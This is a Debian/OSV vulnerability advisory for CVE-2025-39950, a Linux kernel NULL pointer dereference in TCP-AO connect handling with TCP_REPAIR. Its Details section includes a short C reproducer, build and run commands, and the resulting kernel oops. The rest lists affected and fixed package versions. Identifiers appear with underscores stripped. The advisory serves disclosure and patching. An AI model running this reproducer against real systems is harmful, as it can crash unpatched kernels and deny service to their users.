DEBIAN-CVE-2025-39950

Source
https://security-tracker.debian.org/tracker/CVE-2025-39950
Import Source
https://storage.googleapis.com/debian-osv/debian-cve-osv/DEBIAN-CVE-2025-39950.json
JSON Data
https://api.osv.dev/v1/vulns/DEBIAN-CVE-2025-39950
Upstream
Published
2025-10-04T08:15:48.253Z
Modified
2025-11-20T10:18:18.693123Z
Summary
[none]
Details

In the Linux kernel, the following vulnerability has been resolved: net/tcp: Fix a NULL pointer dereference when using TCP-AO with TCPREPAIR A NULL pointer dereference can occur in tcpaofinishconnect() during a connect() system call on a socket with a TCP-AO key added and TCPREPAIR enabled. The function is called with skb being NULL and attempts to dereference it on tcphdr(skb)->seq without a prior skb validation. Fix this by checking if skb is NULL before dereferencing it. The commentary is taken from bpfskopsestablished(), which is also called in the same flow. Unlike the function being patched, bpfskopsestablished() validates the skb before dereferencing it. int main(void){ struct sockaddrin sockaddr; struct tcpaoadd tcpao; int sk; int one = 1; memset(&sockaddr,'\0',sizeof(sockaddr)); memset(&tcpao,'\0',sizeof(tcpao)); sk = socket(AFINET, SOCKSTREAM, IPPROTOTCP); sockaddr.sinfamily = AFINET; memcpy(tcpao.algname,"cmac(aes128)",12); memcpy(tcpao.key,"ABCDEFGHABCDEFGH",16); tcpao.keylen = 16; memcpy(&tcpao.addr,&sockaddr,sizeof(sockaddr)); setsockopt(sk, IPPROTOTCP, TCPAOADDKEY, &tcpao, sizeof(tcpao)); setsockopt(sk, IPPROTOTCP, TCPREPAIR, &one, sizeof(one)); sockaddr.sinfamily = AFINET; sockaddr.sinport = htobe16(123); inetaton("127.0.0.1", &sockaddr.sinaddr); connect(sk,(struct sockaddr *)&sockaddr,sizeof(sockaddr)); return 0; } $ gcc tcp-ao-nullptr.c -o tcp-ao-nullptr -Wall $ unshare -Urn BUG: kernel NULL pointer dereference, address: 00000000000000b6 PGD 1f648d067 P4D 1f648d067 PUD 1982e8067 PMD 0 Oops: Oops: 0000 [#1] SMP NOPTI Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020 RIP: 0010:tcpaofinishconnect (net/ipv4/tcp_ao.c:1182)

References

Affected packages

Debian:13 / linux

Package

Name
linux
Purl
pkg:deb/debian/linux?arch=source

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
6.12.57-1

Affected versions

6.*

6.12.38-1
6.12.41-1
6.12.43-1~bpo12+1
6.12.43-1
6.12.48-1
6.12.57-1~bpo12+1

Ecosystem specific

{
    "urgency": "not yet assigned"
}

Database specific

source

"https://storage.googleapis.com/debian-osv/debian-cve-osv/DEBIAN-CVE-2025-39950.json"

Debian:14 / linux

Package

Name
linux
Purl
pkg:deb/debian/linux?arch=source

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
6.16.9-1

Affected versions

6.*

6.12.38-1
6.12.41-1
6.12.43-1~bpo12+1
6.12.43-1
6.12.48-1
6.12.57-1~bpo12+1
6.12.57-1
6.13~rc6-1~exp1
6.13~rc7-1~exp1
6.13.2-1~exp1
6.13.3-1~exp1
6.13.4-1~exp1
6.13.5-1~exp1
6.13.6-1~exp1
6.13.7-1~exp1
6.13.8-1~exp1
6.13.9-1~exp1
6.13.10-1~exp1
6.13.11-1~exp1
6.14.3-1~exp1
6.14.5-1~exp1
6.14.6-1~exp1
6.15~rc7-1~exp1
6.15-1~exp1
6.15.1-1~exp1
6.15.2-1~exp1
6.15.3-1~exp1
6.15.4-1~exp1
6.15.5-1~exp1
6.15.6-1~exp1
6.16~rc7-1~exp1
6.16-1~exp1
6.16.1-1~exp1
6.16.3-1~bpo13+1
6.16.3-1
6.16.5-1
6.16.6-1
6.16.7-1
6.16.8-1

Ecosystem specific

{
    "urgency": "not yet assigned"
}

Database specific

source

"https://storage.googleapis.com/debian-osv/debian-cve-osv/DEBIAN-CVE-2025-39950.json"